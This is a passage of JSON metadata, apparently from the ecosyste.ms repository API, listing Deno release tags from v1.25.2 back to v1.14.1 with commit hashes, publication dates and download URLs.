/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kin